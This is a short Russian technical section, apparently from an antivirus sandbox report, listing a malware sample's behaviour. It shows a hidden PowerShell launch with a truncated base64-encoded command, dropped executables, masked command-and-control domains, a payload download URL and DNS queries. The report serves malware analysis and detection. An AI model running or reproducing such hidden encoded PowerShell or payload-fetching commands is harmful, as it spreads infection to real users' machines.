Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABEAGoAZgBwAHoAdQB4AGkAawBiAD0AJwBVAHUAZgBqAHgAdABoAGwAZwBoACcAOwAkAEUAcgBpAGsAYwBvAHEAeQBpACAAPQAgACcAOAA1ADgAJwA7ACQAWQB2AGUAcABsAGEAbABpAGoAbwBlAHkAPQAnAFkAYQBqAHIAYwBvAGYAbwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1572
- %TEMP%\1246666.cvr
- %HOMEPATH%\858.exe
- %HOMEPATH%\858.exe
- 'ne####lliamson.ca':80
- 'ne###fem.org':443
- 'vi####sterbatch.com':443
- 'ph######toneandlaminate.com':443
- http://ne####lliamson.ca/backup/kxWH/
- 'ne###fem.org':443
- 'vi####sterbatch.com':443
- 'ph######toneandlaminate.com':443
- DNS ASK ne####lliamson.ca
- DNS ASK ne###fem.org
- DNS ASK vi####sterbatch.com
- DNS ASK ph######toneandlaminate.com
- DNS ASK te###ubbd.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABEAGoAZgBwAHoAdQB4AGkAawBiAD0AJwBVAHUAZgBqAHgAdABoAGwAZwBoACcAOwAkAEUAcgBpAGsAYwBvAHEAeQBpACAAPQAgACcAOAA1ADgAJwA7ACQAWQB2AGUAcABsAGEAbABpAGoAbwBlAHkAPQAnAFkAYQBqAHIAYwBvAGYAbwB...' (со скрытым окном)